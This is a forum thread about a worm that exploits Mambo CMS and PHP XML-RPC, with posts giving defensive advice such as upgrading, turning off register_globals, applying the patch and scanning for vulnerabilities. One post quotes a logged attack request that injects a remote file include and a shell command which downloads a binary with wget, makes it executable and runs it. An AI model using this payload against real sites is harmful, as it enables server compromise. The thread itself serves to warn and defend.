Welcome to WebmasterWorld Guest from 220.127.116.11
Forum Moderators: ergophobe
F-Secure is warning of a network worm that targets vulnerabilities in the Mambo Content Management System (CMS) and PHP XML-RPC, a library of code for PHP programmers that allows procedures to run between computers with different operating systems.
"GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://[edit ip removed]/cmd.gif?&cmd=cd%20/tmp;wget%[edit ip removed]/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo¦ HTTP/1.1" 404 295 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
The best thing you can do is not only upgrade to the newest version of Mambo/Joomla, but add the following line to php.ini. It will stop PHP programs to use variables injected via the URL, unless the program specifically requests them. It will not only close this hole, but also holes that are not discovered yet.
Remember to test your site after changing this setting, because many PHP based sites rely on the easy way that global information is passed to the internals of PHP when the setting is set to on and the site might stop working properly when register_globals is set to off.
Sometimes you have to get hacked and learn the hard way. That happened on one of the sites we maintain, and we now have learned our lesson and incorporate web vulnerability scanning into our development lifecycle.
The vulnerability in Mambo is the one that was fully described on 21 November 2005, when a patch was provided against such exploits. The patch can be applied to any version of Mambo, or any PHP program.